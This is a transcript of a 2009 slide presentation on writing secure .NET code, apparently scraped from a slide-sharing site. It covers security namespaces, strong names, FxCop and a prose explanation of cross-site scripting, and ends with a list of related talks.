Presentation is loading. Please wait.

Presentation is loading. Please wait.

Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009.

Published byAutumn Ray Modified over 11 years ago

Similar presentations

Presentation on theme: "Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009."— Presentation transcript:

1 Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009

2 Agenda Introduction Security overview Security Procedural Coding Q&A

3 About me… Sam Nasr Independent Software Consultant Nasr Information Systems Software developer since 1995 MCAD, MCT, MCTS(WSS/MOSS) President - Cleveland C#/VB.Net User Group Contact Info E-mail: sam@nasr.info Blog: ClevelandDotNet.blogspot.com/

4 Setting Expectations What will be covered Overview of security in.Net FW Some coding techniques, due to time Take home Laundry List Discuss code and organizational policies What will NOT be covered COM, Activex DB Security Identifying Security Bugs

5 Why Security? Protect the Data Credit Card #s Corporate Data (Financial info) Patient Information Ensure App Integrity Prevent loss of revenue (i.e. $1 plane tickets) Uptime (DOS Attacks) Ensure App Authenticity Customers run intended applications

6 What are the odds? 1 Developer vs. Many Hackers 1 Dev Hour vs. Many hacker hours Salary vs. Personal Pride Focused vs. Continuous Attempts

7 Points of Entry

8 Holistic Security Physical Location of servers ALL servers (App & DB) must be configured for security Train users against social engineering Security code review Security Testing Practice Active Defense Recovery Plan Keep your users aware of the security risk

9

10

11 Active Defense Monitoring Out of bounds pricing Excessive # of transactions After hours access Extended login time

12 .Net 101 (know the basics) Compile code to ? How does the code execute? Hows JIT used? Hows CLR used?

13 Security Namespaces System.Security System.Web.Security System.Security.Cryptography System.Security.Principal System.Security.Policy System.Security.Permissions

14 Demo ILDASM/ILASM

15 Security Tools DotFuscator FX Cop Anti-Cross Site Scripting Library Security Assessment Tool

16 Strong Names Private and Public keys tokens Regular Name (BookInventory) Version Number (1.0.0.0) Culture (neutral) Public key Token Note: Protect Private Key Utilize AssemblyDelaySign

17 Demo Strong Names

18 Anti-Cross Site Scripting Library A Cross Site Scripting attack (XSS): when a hacker inserts a link in an e-mail or web forum that appears to be legitimate (i.e. cnn.com, google.com). However, the link actually a malicious script code embedded in the URL. When the unsuspecting user clicks the link, the script is executed on the host web site. The script code maybe used to transfer cookies from the victim's PC to the hacker's machine. The cookies may contain user ID's, passwords, or possibly credit card information, all which can be used for illegal purposes. http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92- 7AD9-496C-9A89-AF08DE2E5982&displaylang=en

19 Demo FXCop

20 Demo Security Assessment Tool

21 Conclusion Lets recap… Procedural Coding

22 References Understanding MSIL www.ClevelandDotnet.info - Presentations FXCop http://www.microsoft.com/downloads/details.aspx?familyid=9AEAA970-F281-4FB0-ABA1- D59D7ED09772&displaylang=en Securing Connection Strings via code: http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx via cmd line: http://msdn.microsoft.com/en-us/library/dx0f3cf2(VS.80).aspx

23 Questions?

24 Contact Info Sam Nasr E-mail: sam@nasr.info Blog: ClevelandDotNet.blogspot.com/ Cleveland C#/VB.Net User Group Web: www.ClevelandDotNet.info

Download ppt "Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009."

Similar presentations

Introduction to SharePoint for .NET Developer

Introduction to SharePoint for .NET Developer
Introduction to.Net By Sam Nasr May 5, 2006 www.ClevelandDotNet.info.

Introduction to.Net By Sam Nasr May 5,
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
SQL Server Reporting Services By Sam Nasr March 29, 2005 www.ClevelandDotNet.info.

SQL Server Reporting Services By Sam Nasr March 29,
Distributed Applications By Sam Nasr, MCP www.ClevelandDotNet.info.

Distributed Applications By Sam Nasr, MCP
ASP.Net 2.0 By Sam Nasr April 27, 2006 www.ClevelandDotNet.info.

ASP.Net 2.0 By Sam Nasr April 27,
Windows Workflow Foundation By Sam Nasr, MCAD October 23, 2007 www.ClevelandDotNet.info.

Windows Workflow Foundation By Sam Nasr, MCAD October 23,
.NET Technology. Introduction Overview of.NET What.NET means for Developers, Users and Businesses Two.NET Research Projects:.NET Generics AsmL.

.NET Technology. Introduction Overview of.NET What.NET means for Developers, Users and Businesses Two.NET Research Projects:.NET Generics AsmL.
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.
Eric J. Oszakiewski MCTS: SharePoint Application Development SharePoint Configuration.

Eric J. Oszakiewski MCTS: SharePoint Application Development SharePoint Configuration.
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
Using.NET Platform Note: Most of the material of these slides have been taken & extended from Nakov’s excellent overview for.NET framework, MSDN and wikipedia.

Using.NET Platform Note: Most of the material of these slides have been taken & extended from Nakov’s excellent overview for.NET framework, MSDN and wikipedia.
SO YOU WANT TO BE A HACKER? Maybe not yet, but you will at the end of the hour!

SO YOU WANT TO BE A HACKER? Maybe not yet, but you will at the end of the hour!
Configuring Windows to run Dr.Web scanner remotely.

Configuring Windows to run Dr.Web scanner remotely.
Net security - budi rahardjo Overview of Network Security Budi Rahardjo CISCO seminar 13 March 2002.

Net security - budi rahardjo Overview of Network Security Budi Rahardjo CISCO seminar 13 March 2002.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Lynn Ray ISO Towson University Strategic Planning for IT Security Copyright Lynn Ray, 2007. This work is the intellectual property rights of the author.

Lynn Ray ISO Towson University Strategic Planning for IT Security Copyright Lynn Ray, This work is the intellectual property rights of the author.
By Sam Nasr Nasr Information Systems May 14, 2013.

By Sam Nasr Nasr Information Systems May 14, 2013.
Network Security aka CyberSecurity Monitor and manage security risks at the network level for the entire Johns Hopkins Network.

Network Security aka CyberSecurity Monitor and manage security risks at the network level for the entire Johns Hopkins Network.
Defense-in-Depth Against Malicious Software Jeff Alexander IT Pro Evangelist Microsoft Australia

Defense-in-Depth Against Malicious Software Jeff Alexander IT Pro Evangelist Microsoft Australia

Similar presentations

Ads by Google